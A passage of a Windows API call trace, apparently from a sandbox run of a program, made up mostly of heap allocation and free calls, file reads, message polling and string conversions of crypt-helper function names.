RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0099.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0099.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0099.366] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0099.367] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0099.369] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x6f6b, lpOverlapped=0x0) returned 1 [0099.369] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0099.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0099.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16f6b) returned 0x4516010 [0099.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0099.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0099.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16f6b) returned 0x452cf88 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.374] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16f6b) returned 0x4516010 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.374] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0099.375] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0099.375] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0099.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0099.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16f6b) returned 0x4516010 [0099.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0099.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16f6b) returned 0x499a008 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0099.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0099.377] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0099.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0099.377] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0099.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0099.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0099.378] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0099.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0099.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0099.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0099.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0099.378] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0099.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0099.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.379] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0099.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.380] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0099.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0099.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.381] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0099.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0099.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, 